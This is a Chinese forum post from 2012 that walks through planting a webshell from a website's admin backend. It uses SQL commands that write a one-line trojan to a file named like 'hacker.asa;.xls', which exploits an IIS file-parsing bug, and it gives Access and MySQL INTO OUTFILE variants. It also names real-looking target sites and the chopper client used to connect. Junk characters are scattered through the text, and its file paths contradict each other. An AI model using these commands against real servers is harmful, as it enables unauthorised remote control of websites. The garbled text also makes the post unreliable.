好不容易进了后台,发现啥上传啊。备份啊多木有。
9 q) v a! ~3 Ywebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
5 w: I# Z0 d1 u. A3 j" p- y2 o文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,( t, ? p& N9 R6 x! D
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
7 V. _/ M1 _! [7 r B1.create table cmd (a varchar(50))2 Y6 y# R1 p! O& c* U
2.insert into cmd (a) values (‘‘)
. e% k0 V# h1 m. s3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd9 t/ M4 ~: k, V$ ^* E( i+ D. c5 S
(把表cmd的内容导出为物理路径的一个EXCEL文件)4 P6 E6 H$ G9 y; ~. D5 D; h' b
4.drop table cmd+ q% u g) T" H0 }
利用IIS的BUG成功拿到了WEBSHELL。6 m9 E. D2 `) e* }2 [$ t c
. k% b$ `4 f# I0 G5 y/ }: Y直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话4 O: M& |$ S \
0 \0 x& i" l1 v" w9 N' X% |+ A2 U SQL语句意思解释:
+ G$ w+ S( q& @% P; K 第一句* \1 c# g6 }& O) {1 b+ U
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
' i4 G- u9 {7 D! `/ I/ s+ ]
4 y3 ]9 J; v0 K0 ^# V7 v& m* T 第二句" I9 C2 t3 t* ^5 k4 i) H6 z; h
在表cmd的a字段插入一句话木马5 ]$ N: O- c7 k+ B
第三句$ f C2 C# C; `! s* e
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件* d. b; W i0 ~0 E+ F0 f$ s [
2 y4 w$ x7 ]& l
第四句# T9 b( \0 I) R$ ^1 D
删除建立的cmd表
* M3 u+ [9 H6 i( {+ ^+ \
* F7 t4 }3 E& {0 c 以下内容为测试:0 {( c) c8 V7 u9 e5 g
Access利用后台SQL执行命令功能导出WebShell:
5 g, q1 Y; B! ^' w& E2 G6 Q 这个更简单:# n$ Z. l4 [# \' b h" T( z) g
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]+ a5 G8 V8 c$ ^0 B" T, A: C
或者; k4 V; M* y' ^" d
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]% D; v2 z/ D! z3 b/ R
. T: Z/ w0 J& W/ S3 r 后台有执行SQL语句功能(vote为已知表段)3 a4 ~/ j- y, \4 Y3 [ W2 x+ M
希望对大家有所帮助拿shell的又一个思路
% Z7 F. R, r% b+ D2 v B9 i |
发表于 2012-9-13 17:53:58
收藏
支持
反对